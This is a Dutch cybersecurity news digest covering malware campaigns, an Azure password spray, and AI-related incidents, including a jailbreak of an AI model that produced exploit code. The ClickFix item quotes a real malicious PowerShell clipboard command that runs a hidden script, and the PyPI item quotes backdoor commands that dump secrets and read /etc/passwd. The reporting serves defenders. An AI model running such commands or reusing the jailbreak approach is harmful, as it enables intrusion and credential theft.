De techniek die de campagne zijn naam geeft, is steganografie: uitvoerbare code verbergen in bestanden die er volkomen normaal uitzien. De vroegste varianten voegden JavaScript toe na de 'IEND'-marker van een PNG-icoon, waardoor de afbeelding overal correct werd weergegeven terwijl het een payload droeg die statische scanners niet detecteerden. Toen detectie verbeterde, verschoof de actor naar WebP-afbeeldingen en vervolgens naar WOFF2-lettertypebestanden, waarbij code werd verborgen in glyph-bereiken die werden gelezen als Aziatische tekst of lettertype-metadata. Microsoft noemt steganografie op deze schaal zeldzaam in het ecosysteem van browserextensies.

Sommige varianten met grote impact verzonden de payload niet eens lokaal. Ze haalden een normaal ogende afbeelding op van een command-and-controlserver (C2-server). De extensie decodeerde deze via lagen van hoofdletterwisselingen, cijferwisselingen, Base64 en XOR, controleerde deze tegen een handtekening en voerde deze vervolgens uit. De C2-server leverde het echte bestand alleen aan verzoeken die een vingerafdruk- en User-Agent-controle doorstonden; iedereen die het rechtstreeks probeerde te benaderen, inclusief onderzoekers, kreeg een lege decoy-respons. De extensies hielden ook open DevTools in de gaten en verlengden hun dormantie als ze een analist opmerkten.

De zichtbare schade bestond uit advertentiefraude: geïnjecteerde advertenties, gekaapte affiliatecommissies op Amazon, eBay en AliExpress, en omgeleide zoekopdrachten, allemaal om geld af te romen terwijl de browse-ervaring verslechterde. Microsoft's analyse van de opgehaalde payloads toonde echter veel meer aan. De payloads omvatten een backdoor voor remote code execution die willekeurige JavaScript van de server uitvoerde. Ze stalen ook Google-inloggegevens en codes voor twee-factor authenticatie bij het inloggen, verzamelden WordPress-admin-logins en exfiltreerden cookies in bulk voor sessie-hijacking.

Microsoft stelt dat zeven Google Analytics tracking-ID's dienden als verborgen telemetrie, waardoor de operator bijna realtime dashboards van de campagne kreeg via de eigen infrastructuur van Google. De onderliggende infrastructuur paste bij de ambitie. Microsoft telde meer dan tien C2-domeinen met automatische failover. De actor proxyde verkeer via Cloudflare Workers en misbruikte GitHub Pages om beacons te hosten. Een polymorf framework werd gebruikt voor ongeveer 66 extensies onder meer dan 15 verschillende naamvarianten, en de operatie migreerde van Manifest V2 naar V3 naarmate de actor zich aanpaste aan platformwijzigingen.

Microsoft heeft alle 119 extensies verwijderd en de meer dan 90 ontwikkelaarsaccounts die erachter zaten, opgeschort. De volledige lijst met extensie-ID's is te vinden in het technische rapport van het bedrijf. Gebruikers wordt geadviseerd om 'edge://extensions' te openen en hun geïnstalleerde add-ons te vergelijken met die lijst. Als er overeenkomsten zijn, of als Edge automatisch een extensie heeft verwijderd, dient de browser als gecompromitteerd te worden beschouwd. Verander wachtwoorden voor Google, WordPress, bankzaken en andere gevoelige accounts. Controleer recente aanmeldingsactiviteit en schakel sterke twee-factor authenticatie in. Hardwarebeveiligingssleutels zijn effectiever tegen dit soort diefstal van inloggegevens dan sms-codes. Microsoft heeft indicators of compromise (IOC's) gepubliceerd voor gebruik in Chrome, Firefox en andere Chromium-browsers.

StegoAd lijkt eerder een nieuw gezicht op een bekende campagne dan een volledig nieuwe campagne. De payload voor inloggegevens exfiltreert naar 'mitarchive.info', een domein dat Koi Security koppelt aan DarkSpectre, de Chinese operatie die het in december in verband bracht met de extensiecampagnes ShadyPanda en GhostPoster. De verbinding gaat verder dan het domein. StegoAd verbergt code in het eigen icoon van een extensie, dezelfde methode die GhostPoster maanden eerder gebruikte. De twee delen zelfs extensienamen, zoals "Ads Block Ultimate". Microsoft heeft de actor niet bij naam genoemd, maar de overlap is duidelijk. De operator is nog steeds actief, aldus Microsoft.

 

Bron: Microsoft

01 juli 2026 | Anthropic herstelt Claude Fable 5 na opheffing exportcontroles door VS

Anthropic heeft besloten zijn geavanceerde AI model Claude Fable 5 wereldwijd weer online te brengen. Deze stap volgt op de opheffing van exportcontroles door het Amerikaanse Ministerie van Handel op 30 juni, die ongeveer twee en een halve week eerder waren ingesteld op Fable 5 en zijn strikter gecontroleerde zusterversie Mythos 5.

Vanaf woensdag 1 juli is Fable 5 weer beschikbaar voor gebruikers via Claude.ai, het Claude Platform, Claude Code en Claude Cowork. De exportcontroles, ingesteld op 12 juni, verboden Anthropic om beide modellen aan buitenlandse staatsburgers, zowel binnen als buiten de Verenigde Staten, inclusief niet-Amerikaanse medewerkers, aan te bieden. Omdat het bedrijf geen betrouwbare methode had om de nationaliteit van elke gebruiker in realtime te controleren, werden beide modellen voor iedereen offline gehaald.

De aanleiding voor de exportcontroles was een "jailbreak" die Amazon-onderzoekers in Fable 5 hadden ontdekt. Deze prompt wist de veiligheidsregels van het model te omzeilen, waardoor Fable 5 in enkele gevallen softwarefouten aan het licht bracht en zelfs code schreef die aantoonde hoe zo'n fout misbruikt kon worden. Anthropic minimaliseerde de bevinding, stellende dat vergelijkbare verzoeken ook werken op zwakkere modellen zoals hun eigen Claude Opus 4.8, OpenAI's GPT-5.5 en China's Kimi K2.7. Het bedrijf omschreef het gedrag als routine defensief beveiligingswerk, geen verborgen superkracht. Echter, zowel de overheid als de partner die de jailbreak meldde, beschouwden het als ernstig genoeg voor noodcontroles.

Om de zorgen weg te nemen, heeft Anthropic een nieuw veiligheidsfilter, een 'classifier' genaamd, getraind. Dit filter detecteert en blokkeert de specifieke techniek die in het rapport werd beschreven, met een effectiviteit van meer dan 99% per 30 juni. Geblokkeerde verzoeken worden doorgestuurd naar het zwakkere Opus 4.8, en de gebruiker wordt hiervan op de hoogte gebracht. Een nadeel hiervan is een toename van valse alarmen bij normaal coderen en debuggen.

Mythos 5, dat dezelfde onderliggende technologie gebruikt maar met minder veiligheidsmaatregelen, blijft onder strenger toezicht. Toegang werd op 26 juni hersteld voor ongeveer 100 Amerikaanse bedrijven en federale instanties die kritieke infrastructuur verdedigen. Anthropic werkt nog samen met de overheid om de toegang verder uit te breiden.

Minister van Handel Howard Lutnick, die de omkering ondertekende, verklaarde dat zijn departement twee weken had besteed aan de evaluatie van de modellen met Anthropic. In zijn brief stemde Anthropic ermee in om zelf te zoeken naar beveiligingsproblemen, te coördineren bij toekomstige lanceringen en elk kwaadaardig gebruik dat het detecteert te rapporteren. De onderhandelingen werden naar verluidt geleid door medeoprichter Tom Brown.

De controverse rondom de exportcontroles was vanaf het begin complex. Meerdere rapporten, waaronder die van The Wall Street Journal, suggereerden dat onderzoek van Amazon en zorgen van CEO Andy Jassy de oorspronkelijke order hadden aangewakkerd. Voormalig AI-tsaar David Sacks beschuldigde Anthropic ervan "het voortdurende aanbod van het consumentenmodel boven veiligheid te hebben geprioriteerd." Anderen zagen het als een overcorrectie. Francesco Bailo, AI-governance onderzoeker aan de Universiteit van Sydney, interpreteerde de omkering als een concessie van de overheid dat ze te ver waren gegaan. Een groep beveiligingsleiders had ook een open brief ondertekend met het verzoek de controles op te heffen.

De concurrentie speelde ook een rol. De pauze viel samen met de opkomst van goedkope, capabele Chinese open source modellen, en verschillende leidinggevenden waarschuwden dat het bevriezen van Amerikaanse modellen rivalen de kans gaf om terrein te winnen.

Anthropic stelt ook een gemeenschappelijke methode voor om de gevaarlijkheid van een jailbreak te rangschikken, iets wat de industrie nog miste. Samen met Amazon, Microsoft, Google en andere partners wil het vier factoren beoordelen: 'Capability gain' (hoeveel verder de jailbreak een gebruiker brengt dan bestaande tools), 'Breadth' (hoeveel verschillende aanvallen dezelfde truc ontgrendelt), 'Ease of weaponization' (hoeveel vaardigheid en moeite het kost om het in een echte aanval om te zetten) en 'Discoverability' (hoe gemakkelijk de truc te vinden of te kopiëren is). Voor de ernstigste gevallen, zoals een jailbreak die aanvallen op elektriciteitsnetwerken of banken mogelijk maakt, zal Anthropic onmiddellijk fixes implementeren zodra de ernst is bevestigd, en het bedrijf richt een team op om 24 uur per dag jailbreak rapporten te monitoren.

Daarnaast heeft Anthropic een HackerOne-programma gelanceerd voor onderzoekers om nieuwe Fable 5 jailbreaks te melden, en heeft het de Amerikaanse overheid eerdere toegang beloofd om toekomstige geavanceerde modellen te testen vóór hun release.

Anthropic is niet het enige laboratorium in deze positie. Dagen eerder presenteerde OpenAI GPT-5.6 aan een kleine, door de overheid goedgekeurde groep in plaats van aan het publiek, onder verwijzing naar dezelfde "dual-use" zorg, namelijk een model dat goed genoeg is om verdedigers te helpen bugs te patchen, is ook goed genoeg om aanvallers te helpen ze te vinden. Het risico is niet hypothetisch. Eerder dit voorjaar testte Anthropic een vorig Mythos-model dat op commando zero-day kwetsbaarheden vond en misbruikte in elk belangrijk besturingssysteem en browser, inclusief een 27 jaar oude fout in OpenBSD. Het red team van Anthropic zette recent bekendgemaakte bugs om in werkende exploits in minder dan een dag.

De directe crisis is voorbij, maar de grotere vraag over de regulering van geavanceerde AI modellen blijft bestaan. Een uitvoerend bevel van 2 juni creëerde een vrijwillig pad voor bedrijven om geavanceerde modellen vóór release te laten beoordelen. Het stelde ook een geclassificeerde benchmark in om te bepalen welke modellen als "gedekt" worden beschouwd, terwijl een verplichte licentie werd uitgesloten. Fable 5 heeft dit pad nooit doorlopen. De overheid greep in plaats daarvan naar exportcontroles, wat aantoont dat wanneer Washington snel wil handelen met een geavanceerd model, het nog steeds geen bindend proces heeft, alleen geïmproviseerde methoden.

 

Bron: Amazon | Bron 2: whitehouse.gov

01 juli 2026 | Massale wachtwoordspray via Azure CLI omzeilt Conditional Access

Cybersecurityonderzoekers hebben gewaarschuwd voor een "massale, voortdurende, geautomatiseerde wachtwoordsprayaanval" die gericht is op de Azure command-line interface (CLI) van Microsoft, waarbij tientallen accounts zijn gecompromitteerd. De activiteit, volgens Huntress, is afkomstig van een IPv6-adresbereik (2a0a:d683::/32) dat wordt beheerd door internetinfrastructuurprovider LSHIY LLC (AS32167).

Tussen 12 en 26 juni voerde de dreigingsactor meer dan 81 miljoen inlogpogingen uit en slaagde erin om ten minste 78 Microsoft accounts binnen 64 organisaties te compromitteren. De targeting van deze aanvallen lijkt volledig gebaseerd te zijn op de prevalentie van wachtwoorden in gecompromitteerde wachtwoord-combolijsten, en is niet specifiek voor bedrijfstype of sector.

Wat de wachtwoordsprayaanval opmerkelijk maakt, is niet alleen de schaal, maar ook het feit dat veel van de gecompromitteerde organisaties Conditional Access-beleid hadden ingeschakeld. Specifiek is gebleken dat de campagne misbruik maakt van een verouderde OAuth-stroom, genaamd Resource Owner Password Credentials (ROPC), om Conditional Access Policy (CAP)-beveiligingen te omzeilen. ROPC is een legacy OAuth 2.0-granttype waarbij een gebruiker zijn gebruikersnaam en wachtwoord rechtstreeks verstrekt aan een clientapplicatie, die deze vervolgens naar een autorisatieserver stuurt om ze uit te wisselen voor een toegangstoken. Deze methode is afgekeurd in OAuth 2.1.

In haar documentatie raadt Microsoft klanten af om ROPC te gebruiken, met het argument dat het incompatibel is met multi-factor authenticatie (MFA). Microsoft stelt dat in de meeste scenario's veiligere alternatieven beschikbaar en aanbevolen zijn. Deze stroom vereist een zeer hoge mate van vertrouwen in de applicatie en brengt risico's met zich mee die niet aanwezig zijn in andere stromen. Het gebruik van deze stroom wordt alleen aanbevolen wanneer veiligere stromen niet haalbaar zijn.

De aanvallen, gericht op credentials en tokens, resulteerden tussen 12 en 21 juni 2026 in een handvol succesvolle inlogpogingen per dag, met gemiddeld twee tot vier gecompromitteerde accounts dagelijks, met uitzondering van 19 juni, toen 12 gebruikersaccounts werden gecompromitteerd. De gestage frequentie veranderde op 22 juni, toen 30 identiteiten binnen 23 bedrijven werden getroffen. In totaal werden 78 gebruikersaccounts gecompromitteerd binnen 64 organisaties als onderdeel van de campagne. Het overgrote deel van de wachtwoordsprayactiviteit kwam van LSHIY LLC. Enkele van de IP-adressen zijn gekoppeld aan de VS, terwijl enkele andere gekoppeld zijn aan China.

Huntress meldde dat deze aanvallen deel uitmaken van een grote golf van credential spray aanvallen over verschillende ASNs, en voegde eraan toe dat het volume van credential spray aanvallen met meer dan 155 keer is toegenomen bij zijn klantenbestand. De aanvallen namen met name toe eind mei tot begin juni, met een huidige gemiddelde waarde van ongeveer 1.964 mislukte aanvallen per maand per door Huntress beschermde tenant.

De activiteit lijkt specifiek oude gebruikersnaam/wachtwoord-combinaties te gebruiken die eerder waren gelekt maar nooit waren gewijzigd. Het gebruik van de ROPC-vector betekende dat de aanvallers bedrijven konden targeten die MFA hadden geïmplementeerd, maar waarbij dit niet was afgedwongen of geconfigureerd voor Azure CLI ROPC-inlogpogingen. Dit omvatte scenario's waarbij MFA niet werd geactiveerd, bijvoorbeeld door MFA alleen af te dwingen voor specifieke apps in plaats van "Alle Cloud Apps", waardoor Azure CLI-inlogpogingen die door de dreigingsactoren werden gebruikt, niet werden gedekt. Ook het afdwingen van MFA alleen voor specifieke gebruikersgroepen, zoals beheerders, of alleen wanneer verzoeken afkomstig zijn van niet-vertrouwde locaties, bleek onvoldoende.

Huntress merkte op dat acht bedrijven die door de campagne werden getroffen, helemaal geen MFA-beleid hadden. Hoewel dreigingsactoren in deze campagne konden binnendringen ondanks ingestelde MFA, moet de conclusie niet zijn dat MFA helemaal niet werkt; in plaats daarvan moeten organisaties ervoor zorgen dat hun MFA-beleid correct is geconfigureerd om de autorisatiestroom aan te pakken die bij deze incidenten wordt gebruikt.

Om deze aanval af te weren, wordt organisaties geadviseerd om MFA te vereisen voor Alle Gebruikers, Alle Cloud Apps en Alle Client App-typen bij het inschakelen van CAP, de Azure CLI-applicatie te beperken voor niet-beheerders, en de respons te prioriteren op basis van de geldigheid van de credentials. Onderzoekers van Huntress concludeerden dat deze aanval scheuren blootlegt in CAP's die niet correct zijn geconfigureerd. Er zijn nog steeds potentiële zwakke punten in de manier waarop CAP's worden ingezet, waardoor dreigingsactoren kunnen binnenglippen. Een opvallende fout hier is dat legacy-protocollen zoals ROPC sommige slecht geconfigureerde CAP's volledig kunnen omzeilen, aangezien ze niet via het autorisatie-eindpunt gaan waar beleid wordt afgedwongen.

 

Bron: Huntress | Bron 2: learn.microsoft.com

01 juli 2026 | Evolutie van ClickFix malware: API gestuurde levering en methoden voor heimelijke levering ontdekt

Nieuw onderzoek van beveiligingsonderzoeker Bert-Jan Pals onthult een significante evolutie in de ClickFix-malware, een techniek die gebruikers misleidt om handmatig kwaadaardige software uit te voeren. De bevindingen, gepresenteerd op OrangeCon in begin juni en gedetailleerd gepubliceerd op 30 juni, tonen aan dat de commando's achter de valse "bewijs dat je mens bent"-pagina's nu worden geleverd via API gestuurde servers. Deze servers bieden elke bezoeker dezelfde malware in een andere vermomming. Daarnaast is een nieuwe leveringsmethode ontdekt die is ontworpen om de scriptscanning van Windows te omzeilen.

ClickFix werkt door een misleidende pagina met een nep-CAPTCHA of foutmelding te tonen. Verborgen JavaScript plaatst een kwaadaardig commando in het klembord van de gebruiker, waarna de pagina de gebruiker instrueert om een toetsencombinatie in te drukken, de inhoud te plakken en op Enter te drukken. Hierdoor voert de gebruiker zelf de malware uit. Deze methode omzeilt vaak traditionele antivirus- en endpointcontroles, omdat er in de eerste stap geen exploit is en vaak geen bestand dat door antivirus kan worden gedetecteerd. De effectiviteit van ClickFix blijkt uit een stijging van 517% die ESET tussen eind 2024 en de eerste helft van 2025 waarnam, en Microsoft's 2025 Digital Defense Report noemde het in 47% van de initiële toegangscases die door het Defender Experts-team werden gezien. De techniek heeft inmiddels een eigen vermelding in MITRE ATT&CK: T1204.004.

De nieuwe ontwikkeling ligt in de manier waarop de payloads worden gegenereerd. Pals ontdekte dat de pagina's hun commando's ophalen van backend servers die functioneren als een dienst op aanvraag. Deze servers verwerken verzoeken, controleren een toegangstoken, loggen de aanroeper en retourneren elke keer een vers versleuteld commando. Bij een test ontving Pals honderd verschillende payloads na honderd verzoeken, verpakt in een roterende mix van Base64, AES, TripleDES, Rijndael en Deflate. Eenmaal uitgepakt, leidden deze, vooralsnog, allemaal naar hetzelfde script dat in het geheugen via een PowerShell-runspace wordt uitgevoerd. Hetzelfde platform dient lokmiddelen in 25 talen en stemt het commando af op het besturingssysteem van de bezoeker, met zowel macOS- als Windows-versies. ESET heeft al criminelen gevolgd die kant-en-klare ClickFix-bouwers aan andere aanvallers verkopen, wat de commercialisering van deze techniek benadrukt.

Een stillere methode is de 'Downloads-map methode'. In plaats van een kwaadaardig commando te kopiëren, kopiëren de nieuwere pagina's een onschuldig ogend commando. De pagina downloadt stilletjes een bestand naar de Downloads-map, en het klembord ontvangt een korte 'orchestrator'-regel die dat bestand verplaatst, uitpakt en het script erin uitvoert. Omdat de geplakte regel alleen de orchestrator is en niet de payload zelf, is deze ontworpen om AMSI (Windows-functie voor scriptscanning) te omzeilen. De kwaadaardige code bevindt zich in het gedownloade bestand. Een waargenomen klembordregel zag er bijvoorbeeld als volgt uit: `powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # \"* I am not a robot reCAPTCHA Verification ID:7947 *\""`.

De uitvoering is ook verschoven naar meer heimelijkheid. Waar de originele ClickFix-lokmiddel uit 2024 gebruikers instrueerde om Windows+R in te drukken en in het Run-venster te plakken, wijst een nieuwere versie, gangbaar in 2025 en 2026, hen naar Windows+X en de Windows Terminal. Terminal gebruik ziet er gewoner uit en, in tegenstelling tot het Run-venster, laat het geen spoor achter in de RunMRU-registersleutel die onderzoekers normaal controleren. Proofpoint heeft door de staat gesteunde groepen uit Rusland, Iran en Noord-Korea, waaronder APT28, MuddyWater en Kimsuky, in verband gebracht met campagnes die ClickFix in hun bestaande infectieketens opnamen. Noord-Koreaanse groepen ontwikkelden zelfs een nep-vacature "ClickFake Interview"-versie om werknemers in de cryptocurrency-sector te treffen. Varianten zoals FileFix en DownloadFix zijn ook opgedoken. De schaal is aanzienlijk. Beveiligingsbedrijf Expel ontdekte dat één ClearFake-golf sinds augustus 2025 waarschijnlijk maar liefst 147.521 systemen heeft geïnfecteerd.

Verdedigers moeten zich richten op procesketens in plaats van klembordtekst: `explorer.exe` of `WindowsTerminal.exe` die `powershell.exe`, `cmd.exe` of `msiexec.exe` starten en direct daarna contact leggen met het netwerk. Dit waren de meest voorkomende launchers in de gegevens van Pals, met PowerShell en cmd beide op ongeveer 39% en msiexec op 34%. Gedragsgerichte EDR, regels voor applicatiebeheer die beperken welke programma's scriptinterpreters kunnen aanroepen, en duidelijke gebruikersrichtlijnen ("plak nooit een commando dat je moet uitvoeren in het Run-venster of een terminal") blijven allemaal van kracht. De Downloads-map methode voegt één extra aandachtspunt toe, namelijk een onschuldig ogende éénregelige opdracht die de Downloads-map aanraakt en vervolgens een verborgen PowerShell opstart. Pals heeft tijdens zijn onderzoek drie payload servers geïdentificeerd, hoewel een verbinding met deze servers alleen bewijst dat een commando waarschijnlijk in het klembord is geplaatst. Zijn conclusie is duidelijk: "ClickFix blijft bestaan." De constante aanpassing van ClickFix aan verdedigingsmaatregelen, zoals de overstap naar dienst op aanvraag payload servers, maakt deze techniek moeilijk te bestrijden.

 

Bron: Microsoft

01 juli 2026 | Nieuwe AI-dreiging 'Phantom Squatting' misbruikt gehallucineerde domeinen

Onderzoekers van Unit 42, de dreigingsonderzoeksafdeling van Palo Alto Networks, hebben een nieuwe aanvalsmethode ontdekt die zij 'phantom squatting' noemen. Deze techniek maakt misbruik van de neiging van grote taalmodellen (LLM's) om niet-bestaande webdomeinen voor legitieme merken te hallucineren. Kwaadwillenden registreren vervolgens deze door AI gehallucineerde domeinen om verkeer te onderscheppen dat door AI-systemen wordt gegenereerd, wat een aanzienlijk risico vormt voor de supply chain van software.

De onderzoekers hebben actief de registratie van domeinen met een hoge prioriteit, die door AI werden gehallucineerd, gemonitord. Dit leidde tot daadwerkelijke detecties in verschillende sectoren. Het onderzoek toonde aan dat het gebruik van deze domeinen 18 tot 51 dagen vóór de daadwerkelijke registratie door aanvallers kon worden voorspeld. Een opvallend geval betrof een aanvaller die een codeerassistent met AI gebruikte om een complete phishingkit te bouwen, genaamd "Montana Empire". Deze kit was gericht op een domein dat de detectie-pipeline van Unit 42 23 dagen eerder als een doelwit met hoog risico op hallucinatie had geïdentificeerd. Dit demonstreerde de volledige cyclus van aanvalsontwikkeling geholpen door AI tot de voorspelling van een door een LLM gehallucineerd domein.

Om de risico's van phantom squatting in kaart te brengen, analyseerde Unit 42 913 wereldwijde merken en voerde 685.339 query's voor URL's uit over meerdere configuraties van twee verschillende LLM-modellen. Dit resulteerde in 2,1 miljoen gegenereerde URL's, waarvan meer dan 13.229 werden bevestigd als kwaadaardige URL's. Bovendien ontdekten de onderzoekers ongeveer 250.000 gehallucineerde domeinen die nog niet zijn geregistreerd. Dit biedt cybercriminelen een aanzienlijke mogelijkheid om de supply chain van software te exploiteren door middel van preventieve registratie, wat de noodzaak benadrukt voor organisaties om alert te zijn op deze opkomende dreiging.

 

Bron: Unit 42 | Bron 2: csrc.nist.gov | Bron 3: mastodon.social

01 juli 2026 | Kwaadaardige PyPI-pakketten kapen Telegram bot servers

Een campagne die sinds november 2025 actief is, richt zich op Python ontwikkelaars die Telegram bots bouwen. Aanvallers gebruiken hiervoor trojanized Pyrogram forks, kwaadaardige varianten van de populaire Pyrogram bibliotheek, om toegang te krijgen tot servers van slachtoffers en willekeurige bestanden te kunnen lezen. Minstens acht kwaadaardige pakketten zijn gepubliceerd op de Python Package Index (PyPI).

De Pyrogram bibliotheek, hoewel niet langer onderhouden, blijft populair met bijna 350.000 maandelijkse downloads op PyPI en meer dan 1.400 forks op GitHub. Het framework stelt ontwikkelaars in staat om geautomatiseerde bots te creëren voor de Telegram MTProto API.

Onderzoekers van applicatiebeveiligingsbedrijf Checkmarx, die de campagne 'Operation Navy Ghost' hebben genoemd, ontdekten dat de dreigingsactor tussen november 2025 en juni 2026 verschillende kwaadaardige Pyrogram forks op PyPI heeft geplaatst. Deze omvatten: VLifeGram (negen versies, 4.150 downloads), VLife-Gram (vijf versies, 1.030 downloads), pyrogram-navy (zes versies, 2.530 downloads), pyrogram-styled (meer dan zestien versies, 15.370 downloads), pyrogram-zeeb (één versie, 432 downloads), kelragram (drie versies, 1.041 downloads), sepgram (één versie, 264 downloads) en pyrogram-kelra (één versie, 672 downloads).

Alle pakketten zijn forks van het legitieme Pyrogram project en bevatten de originele broncode. De dreigingsactor heeft echter een backdoor genaamd `secret.py` toegevoegd, verborgen in de `helpers` module. Dit kwaadaardige bestand registreert verborgen Telegram command handlers wanneer een geïnfecteerde bot wordt gestart, wat de uitvoering van door de aanvaller geleverde Python code of shell commando's mogelijk maakt.

Wanneer de aanvaller bijvoorbeeld het commando `/asu print(os.environ)` naar de bot van het slachtoffer stuurt, compileert en executeert deze functie de Python code op de machine van het slachtoffer. Dit geeft de aanvaller volledige toegang tot de actieve Telegram client, sessie, chats, contacten en omgevingsvariabelen. Met een commando zoals `/asi cat /etc/passwd` kan de aanvaller shell commando's uitvoeren op de server van het slachtoffer en de output via Telegram berichten ontvangen. Als de output groter is dan 4096 bytes, wordt deze als document bijlage naar de aanvallers gestuurd.

De backdoor bevat een hardcoded 'OWNERS' lijst met Telegram ID's die de dreigingsactoren exclusieve controle geven en tevens de backdoor deactiveren wanneer deze op het systeem van de aanvaller wordt gelanceerd. De malware richt zich specifiek op Telegram bot accounts en is ontworpen om stil te opereren, fouten te onderdrukken en logging uit te schakelen. De onderzoekers van Checkmarx merkten op dat de backdoor alleen wordt geactiveerd op Telegram bot accounts, die doorgaans in productieomgevingen draaien. Dit duidt op een opzettelijke functie, wat aangeeft dat de aanvaller toegang zoekt tot databases, inloggegevens, cloud API's en gevoelige infrastructuur.

Zodra de bot actief is, kan de dreigingsactor elk bestand op de server lezen, geheimen dumpen, toegang krijgen tot de Telegram chats van het slachtoffer, de database downloaden en een persistente backdoor installeren. Ondanks dat de pakketten van verschillende PyPI accounts zijn gepubliceerd, schrijft Checkmarx de campagne toe aan een enkele dreigingsactor. Deze conclusie is gebaseerd op de gedeelde OWNERS lijst, de identieke backdoor code, de commandonamen en de overlappende infrastructuur.

Ontwikkelaars die de genoemde pakketten mogelijk hebben geïnstalleerd, wordt geadviseerd deze onmiddellijk te verwijderen, alle inloggegevens op de getroffen server te roteren en hun Telegram bot tokens in te trekken. Checkmarx heeft indicators of compromise (IOC's) gepubliceerd voor de kwaadaardige Telegram ID's, samen met de profiel-URL's van de aanvaller.

 

Bron: Checkmarx

01 juli 2026 | Anthropic's Claude Code beschuldigd van verborgen code gericht op Chinese gebruikers

Onderzoekers en gebruikers op sociale media beschuldigen het AI-programmeergereedschap Claude Code van Anthropic ervan verborgen code te bevatten die specifiek gericht zou zijn op Chinese gebruikers. Volgens de meldingen controleert de code in versie 2.1.91 en later of een gebruiker via een proxy werkt en of het apparaat een Chinese tijdzone gebruikt, zoals Asia/Shanghai of Asia/Urumqi. Die informatie zou vervolgens worden verwerkt in de systeemprompt, de instructie die het model bij elke opdracht meekrijgt.

De analysedienst Grok bevestigde dat de aangetroffen code daadwerkelijk in Claude Code aanwezig is en proxy- en tijdzonegegevens uitleest. Critici benadrukken dat het probleem niet zozeer is wat de code doet, maar dat een vertrouwde codeeragent dit soort routeringsgegevens stilletjes in prompts verwerkt zonder dat gebruikers het merken.

Anthropic heeft op de ophef gereageerd. Een medewerker verklaarde dat het ging om een experiment dat in maart is gestart om accountmisbruik door ongeautoriseerde wederverkopers tegen te gaan en om het model te beschermen tegen ongeoorloofde nabootsing, ook wel distillation genoemd. Volgens Anthropic zijn sindsdien sterkere maatregelen genomen en is de betreffende code in de eerstvolgende update verwijderd.

Voor gebruikers in Nederland en België onderstreept de kwestie het belang van transparantie bij AI-gereedschappen, zeker bij codeeragenten die toegang hebben tot systemen en opdrachten kunnen uitvoeren. Ongeacht de intentie laat het incident zien hoe lastig het is om verborgen gegevensstromen in AI-software te herkennen, en hoe belangrijk onafhankelijke controle van dergelijke tools is.

 

Bron: Cybercrimeinfo

01 juli 2026 | RustDuck-botnet herbouwt in Rust voor kaping routers en servers voor DDoS aanvallen

Onderzoekers van QiAnXin's XLab hebben sinds februari 2026 een nieuwe twee-fasen malwarefamilie genaamd RustDuck gevolgd, die zich richt op het kapen van thuisrouters, IP-camera's, Android-boxen en slecht beveiligde servers. De geïnfecteerde machines worden vervolgens samengevoegd tot een netwerk dat is ontworpen om websites en online diensten offline te halen door middel van distributed denial-of-service (DDoS)-aanvallen. Het doel is om een doelwit te overspoelen met ongewenst verkeer.

RustDuck onderscheidt zich van andere botnets door twee belangrijke aspecten. De malware wordt momenteel herschreven van de programmeertaal C naar Rust, en de nieuwere versies vertonen ongebruikelijke inspanningen om studie en uitschakeling te voorkomen. De aanvalsstrategie van RustDuck is niet gebaseerd op één enkele truc, maar maakt gebruik van een combinatie van bekende zwakke punten.

De eerste aanvalsmethode betreft apparaten die met het internet zijn verbonden en gebruikmaken van zwakke of standaardwachtwoorden voor hun beheerinterfaces op afstand, zoals Telnet en SSH. Door deze wachtwoorden te raden, krijgen aanvallers toegang. Ten tweede exploiteert RustDuck ongepatchte kwetsbaarheden in apparaten. XLab meldt dat de malware zich richt op blootgestelde Android-foutopsporingsinterfaces en gebreken in apparatuur van TVT (DVR's en camera's), Ruijie, TP-Link en ZTE.

Specifieke, reeds jaren bekende kwetsbaarheden die nog steeds wijdverspreid zijn, worden actief misbruikt:

*   **CVE-2017-17215:** Een kwetsbaarheid voor uitvoering van code op afstand in Huawei HG532-routers, die in 2017 al werd misbruikt door de oorspronkelijke Mirai-botnets.

*   **CVE-2025-29635:** Een kwetsbaarheid voor commando-injectie in de niet langer ondersteunde D-Link DIR-823X-routers. Akamai observeerde in maart 2026 al dat Mirai-varianten deze kwetsbaarheid exploiteerden, waarna CISA deze de maand daarop toevoegde aan de lijst met bekende geëxploiteerde kwetsbaarheden (Known Exploited Vulnerabilities).

*   **CVE-2024-1781:** Een kwetsbaarheid voor commando-injectie in Totolink X6000R-routers, waarvoor de fabrikant nooit reageerde op de openbaarmaking.

*   **CVE-2018-8007:** Een pad voor uitvoering van code op afstand in Apache CouchDB dat door een geauthenticeerde beheerder kan worden misbruikt.

Een derde aanvalsvector is websoftware. RustDuck richt zich ook op bekende lekken in ThinkPHP, Jenkins en Hadoop YARN, waardoor het bereik zich uitstrekt van goedkope thuisapparatuur tot blootgestelde serversoftware. XLab heeft meer dan twintig internetadressen geteld die de malware verspreiden, waarvan het actiefste 176.65.139[.]204 is.

De installatie van RustDuck verloopt in twee fasen. Eerst een kleine loader die een zwaardere kernmodule ontsleutelt en uitpakt. In deze kernmodule bevindt zich de interessante engineering, en dit is het deel dat wordt herschreven in Rust. Rust-binaire bestanden zijn over het algemeen moeilijker voor analisten om te demonteren dan de C-code die jarenlang de basis vormde voor apparaatmalware. XLab stelt dat de Rust-kern van RustDuck een aanzienlijke diepgang vertoont in de manier waarop het sleutels genereert, analyse vermijdt en communiceert met zijn servers. Deze overstap duidt op actieve ontwikkeling, en niet op een snelle aanpassing van gelekte code.

Een belangrijke indicatie van de actieve ontwikkeling is de mate waarin nieuwere samples proberen verborgen te blijven. Voordat RustDuck enige actie onderneemt, voert het een reeks controles uit om te bepalen of het in het lab van een beveiligingsonderzoeker is terechtgekomen in plaats van op een echt slachtofferapparaat. Het zoekt naar analysehulpmiddelen zoals Wireshark en gdb, naar debuggers die aan het eigen proces zijn gekoppeld, naar de vingerafdrukken van een honeypot-val, en zelfs naar hardware van virtuele machines. Elke detectie verhoogt een risicoscore. Bij overschrijding van een drempel wist de malware zijn sporen en stopt voordat het kan worden geobserveerd.

Twee van deze controles vallen op. Een daarvan probeert stilletjes een internetadres te bereiken dat gereserveerd is voor testen en nooit zou moeten antwoorden; als er toch een antwoord komt, weet RustDuck dat het zich in een nepnetwerk bevindt dat is gebouwd om malware te misleiden, en trekt het zich terug. Een andere controle vergelijkt twee klokken om sandboxes te detecteren die de tijd versnellen om malware sneller zijn intenties te laten tonen.

